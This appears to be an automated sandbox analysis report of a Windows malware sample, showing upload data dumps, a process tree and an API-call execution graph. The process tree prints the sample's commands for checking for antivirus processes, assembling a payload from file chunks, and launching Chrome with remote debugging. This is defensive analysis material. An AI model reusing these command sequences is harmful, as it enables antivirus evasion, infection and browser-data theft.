                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                    2024-12-06 08:42:41 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                    Start time:03:40:34
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Users\user\Desktop\Yn13dTQdcW.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\Yn13dTQdcW.exe"
                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                    File size:1'192'690 bytes
                                                                                                                                                                                    MD5 hash:82CCD973E00420A4768BC76D2F442F52
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                    Start time:03:40:35
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c copy Premium Premium.cmd && Premium.cmd
                                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                    Start time:03:40:35
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                    Start time:03:40:38
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                    Imagebase:0x6c0000
                                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                    Start time:03:40:38
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:findstr /I "wrsa opssvc"
                                                                                                                                                                                    Imagebase:0x720000
                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                    Start time:03:40:39
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:tasklist
                                                                                                                                                                                    Imagebase:0x6c0000
                                                                                                                                                                                    File size:79'360 bytes
                                                                                                                                                                                    MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                    Start time:03:40:39
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                    Imagebase:0x720000
                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                    Start time:03:40:39
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:cmd /c md 402438
                                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                    Start time:03:40:39
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:findstr /V "integratedintlhandlingwaterproofcbperformtreasurertim" Recording
                                                                                                                                                                                    Imagebase:0x720000
                                                                                                                                                                                    File size:29'696 bytes
                                                                                                                                                                                    MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                    Start time:03:40:40
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:cmd /c copy /b ..\Coaches + ..\Hypothetical + ..\Nasty + ..\Fly + ..\Zum + ..\Disclose + ..\Expensive + ..\Argue N
                                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:10
                                                                                                                                                                                    Start time:03:40:40
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\402438\Suicide.com
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:Suicide.com N
                                                                                                                                                                                    Imagebase:0x230000
                                                                                                                                                                                    File size:893'608 bytes
                                                                                                                                                                                    MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                    • Detection: 3%, ReversingLabs
                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                    Start time:03:40:40
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:choice /d y /t 5
                                                                                                                                                                                    Imagebase:0xbf0000
                                                                                                                                                                                    File size:28'160 bytes
                                                                                                                                                                                    MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:16
                                                                                                                                                                                    Start time:03:42:13
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Target ID:18
                                                                                                                                                                                    Start time:03:42:14
                                                                                                                                                                                    Start date:06/12/2024
                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2576 --field-trial-handle=2344,i,2585248863302198166,5180447785711478511,262144 /prefetch:8
                                                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                    Reset < >

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:17.5%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                      Signature Coverage:21%
                                                                                                                                                                                      Total number of Nodes:1482
                                                                                                                                                                                      Total number of Limit Nodes:25
                                                                                                                                                                                      execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 4541->4543 4545 4062cf 11 API calls 4542->4545 4544 40145c 18 API calls 4543->4544 4551 402f9d 4544->4551 4546 402f7d 4545->4546 4547 4062cf 11 API calls 4546->4547 4548 402f90 4547->4548 4549 402fa2 4548->4549 4550 402f98 4548->4550 4553 406113 9 API calls 4549->4553 4552 403ea0 5 API calls 4550->4552 4552->4551 4553->4551 4554 4023f0 4555 402403 4554->4555 4556 4024da 4554->4556 4557 40145c 18 API calls 4555->4557 4558 404f9e 25 API calls 4556->4558 4559 40240a 4557->4559 4562 4024f1 4558->4562 4560 40145c 18 API calls 4559->4560 4561 402413 4560->4561 4563 402429 